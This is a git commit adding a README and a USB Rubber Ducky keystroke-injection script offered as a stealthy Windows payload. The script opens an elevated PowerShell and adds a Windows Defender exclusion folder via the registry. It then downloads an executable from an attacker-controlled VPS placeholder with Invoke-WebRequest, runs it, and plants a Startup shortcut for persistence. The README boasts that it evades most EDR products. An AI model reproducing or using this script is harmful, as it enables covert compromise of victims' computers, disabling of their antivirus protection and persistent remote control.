commit
b19ede4efe
|
@ -0,0 +1,24 @@
|
|||
#The-Perfect-Stealthy-Payload
|
||||
|
||||
**Author:** zb0r
|
||||
**Version:** 1.0
|
||||
|
||||
## Description
|
||||
Welcome to the mischievous world of the "Cache Folder Exclusion & Payload Download + Persistence" payload! This payload is like a digital ninja, sneaking into Windows systems, creating a safe haven in the `Windows/temp` folder called `Cache`, adding a sneaky exclusion in Windows Defender, downloading a payload from a VPS, executing it, and ensuring it stays persistent by adding itself to the startup. It's designed to evade most Endpoint Detection and Response (EDR) systems. Just remember, the delay is set for dramatic effect (and testing purposes) but can be sped up to unleash the ninja faster.
|
||||
|
||||
## Target
|
||||
**Operating System:** Windows
|
||||
|
||||
## Note
|
||||
- **Stealth Mode:** This payload is designed to fly under the radar of most EDRs.
|
||||
- **Customizable Speed:** The delays are set for testing; you can reduce them for a quicker execution.
|
||||
|
||||
## Payload Steps
|
||||
1. **Initial Delay:** Give the system a moment to recognize the USB Rubber Ducky.
|
||||
2. **Open PowerShell as Admin:** Trigger the `Run` dialog, type `powershell`, and execute it with administrative privileges.
|
||||
3. **Create Cache Folder:** Make a new folder named `Cache` in the `Windows/temp` directory.
|
||||
4. **Defender Exclusion:** Add the `Cache` folder to Windows Defender exclusions via registry manipulation.
|
||||
5. **Download Payload:** Use `Invoke-WebRequest` to download the payload into the `Cache` folder.
|
||||
6. **Execute Payload:** Run the downloaded payload.
|
||||
7. **Persistence:** Add the payload to startup, ensuring it runs every time the system boots.
|
||||
|
|
@ -0,0 +1,45 @@
|
|||
REM Title: The-Perfect-Stealthy-Payload
|
||||
REM Author: zb0r
|
||||
REM Description: Opens PowerShell as admin, creates a folder in Windows/temp called Cache, adds exclusion in Defender, downloads the payload from VPS/ inside the Cache folder, executes it, and adds it to startup
|
||||
REM Target: Windows
|
||||
REM Note: This evades most EDRs. // Delay is too big for testing purposes, can be lowered significantly. // I removed every instance of my VPS.
|
||||
REM Note: replace VPSIPHERE with the IP of your VPS and the correct port (ex:4444) and the name of your payload (ex: Shelzy.exe)
|
||||
REM Version: 1.0
|
||||
DEFINE #VPSISHERE 0.0.0.0
|
||||
DEFINE #EXE_NAME Shelzy.exe
|
||||
DEFINE #PORT 4444
|
||||
EXTENSION PASSIVE_WINDOWS_DETECT
|
||||
DELAY 100
|
||||
GUI r
|
||||
DELAY 500
|
||||
STRING powershell
|
||||
DELAY 500
|
||||
CTRL SHIFT ENTER
|
||||
DELAY 1000
|
||||
LEFTARROW
|
||||
DELAY 1000
|
||||
ENTER
|
||||
DELAY 1500
|
||||
REM Create Cache folder in Windows/temp
|
||||
STRINGLN mkdir "$env:windir\temp\Cache"
|
||||
DELAY 500
|
||||
|
||||
REM Add exclusion in Defender for Cache folder via registry manipulation
|
||||
STRINGLN Start-Process powershell -Verb RunAs -ArgumentList 'New-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" -Name "C:\Windows\Temp\Cache" -Value "C:\Windows\Temp\Cache" -PropertyType String -Force'
|
||||
DELAY 500
|
||||
|
||||
REM Download payload from VPS Invoke-WebRequest
|
||||
STRINGLN Invoke-WebRequest -Uri "http://#VPSIPHERE:#PORT/#EXE_NAME" -OutFile "$env:windir\temp\Cache\#EXE_NAME"
|
||||
DELAY 3000
|
||||
|
||||
REM Execute the downloaded payload
|
||||
STRINGLN Start-Process "$env:windir\temp\Cache\#EXE_NAME"
|
||||
DELAY 500
|
||||
|
||||
REM Add #EXE_NAME to startup
|
||||
STRINGLN $s=(New-Object -COM WScript.Shell).CreateShortcut("$env:appdata\Microsoft\Windows\Start Menu\Programs\Startup\Shelzy.lnk");$s.TargetPath="$env:windir\temp\Cache\#EXE_NAME";$s.Save()
|
||||
DELAY 500
|
||||
|
||||
STRING EXIT
|
||||
DELAY 300
|
||||
ENTER
|
Loading…
Reference in New Issue